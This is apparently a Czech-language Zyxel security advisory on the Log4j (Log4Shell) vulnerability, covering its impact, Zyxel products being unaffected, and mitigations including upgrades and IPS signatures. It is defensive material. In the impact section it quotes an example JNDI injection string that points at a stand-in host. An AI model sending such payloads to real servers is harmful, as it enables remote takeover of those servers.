Zranitelnost v balíčku log4j
Log4j je open-source projekt, který se běžně používá k logování v programovacím jazyce JAVA. Bylo zjištěno, že do Log4j verzí 2.x.x až 2.14.x byl injektován vzdálený kód. (Nicméně nový exploit, konkrétně CVE-2021-45046, byl odhalen také v log4j verzi 2.15. Z tohoto důvodu doporučujeme přejít na verzi 2.17). Tento kód útočníkům umožňuje odeslat speciální příkaz, a tím snadno získat vzdálený shell (Log4shell).
Dopad
Vzhledem k rozšířenému používání balíčku log4j a k možnosti vzdáleného spuštění kódu bylo této zranitelnosti v systému CVSS přiřazeno nejvyšší skóre 10. V případě zranitelného serveru mohou útočníci do balíčku log4j zasílat příkazy (jako např. ${jndi:ldap:// example.com/a}) a získat shell, který jim umožní kontrolu nad napadeným serverem. Kvůli narušení zabezpečení může být hostitel využit jako bot nebo krypto-těžař nebo případně k zašifrování důležitých souborů pomocí ransomwaru.
Týká se tento problém bezpečnostních zařízení Zyxel?
Společnost Zyxel si je zranitelností v Apache Log4j, které spočívají ve vzdáleném spuštění kódu (RCE), vědoma a potvrzuje, že žádné z jejích bezpečnostních zařízení není touto zranitelností dotčeno [1]. Firewally Zyxel ATP/USG FLEX poskytují před tímto útokem vícevrstvou ochranu.
Snížení rizik
Na hostiteli: doporučujeme provést aktualizaci na nejnovější verzi Apache Log4j (>=2.17.0).
V síti:
- Kvůli snížení rizika útoku nepublikujte zranitelné aplikace na internetu, pokud to není naprosto nezbytné. Ke vzdálenému přístupu k aplikacím používejte VPN.
- Proveďte aktualizaci na nejnovější verzi podpisu IPS a poté pro ochranu vašeho hostitele zapněte funkci IPS. Pokud váš hostitel používá přenos SSL/TLS, doporučujeme kvůli důkladnější detekci zapnout také kontrolu SSL. Pokud útok směřuje ze škodlivé IP adresy, ochrání vás před ním reputační filtr IP adres.
- Z důvodu ochrany před útokem doporučujeme zapnout DNS filtr, URL filtr, filtr obsahu, antivirový program a sandboxing.
Bližší informace o ochraně od společnosti Zyxel:
Věnujte prosím pozornost informacím o podpisech. Zařízení řady ATP/USGFLEX: v4.0.x.20211217.0
V případě zranitelnosti CVE-2021-44228 se používají podpisy s ID 131026, 131027 a 131028.
V případě zranitelnosti CVE-2021-45046 se používají podpisy s ID 131029 a 131030.
Podrobnosti >
Odkaz
